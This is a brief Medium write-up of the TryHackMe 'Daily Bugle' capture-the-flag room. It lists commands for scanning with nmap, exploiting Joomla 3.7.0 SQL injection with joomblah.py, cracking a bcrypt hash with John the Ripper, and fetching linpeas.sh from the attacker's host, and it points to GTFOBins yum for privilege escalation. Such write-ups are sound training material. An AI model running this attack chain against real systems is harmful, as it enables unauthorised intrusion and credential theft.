TryHackMe: Daily Bugle (OSCP approved tools)

  • Public Python Script
  • John the Ripper
  • LinPEAS.sh
  • -vv flag: very verbose. Good for being able to see status and progress.
  • -Pn flag: tells nmap to skip the discovery phase. We know the server is up and may not be responding to pings.
nmap -vv -Pn 10.10.52.102
Joomla version 3.7.0
python2 joomblah.py http://10.10.52.102
Joomblah output with user Jonah’s hash
john jonahHash --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt
wget http://10.9.201.84:8000/linpeas.sh
chmod 777 linpeas.sh
Screenshot from https://gtfobins.github.io/gtfobins/yum/

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Bit by bit directions to Protect Your Computer

[Support Program] A letter from the CC team

Explaining Security Information and Event Management (SIEM)

Humanpad As An IHOLaunchpad Vs BSCPAD? $HUMAN Vs $BSCPAD? How Humanpad Compliments BSCPAD?

How Alibaba Cloud’s Platform Helps Compliance with Chinese Cybersecurity Legislation

{UPDATE} Paint by Number: Color Games Hack Free Resources Generator

The gateway to Web 3.0 Metaverse & Gaming NFTs 🎮 — AcknoLedger

{UPDATE} TGP Surfer Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Hunter Mason

Hunter Mason

More from Medium

Practical malware analysis — Lab 2

TryHackMe: Content Discovery Walkthrough

Steel Mountain TryHackMe Write-Up

Hack The Box — Lame Writeup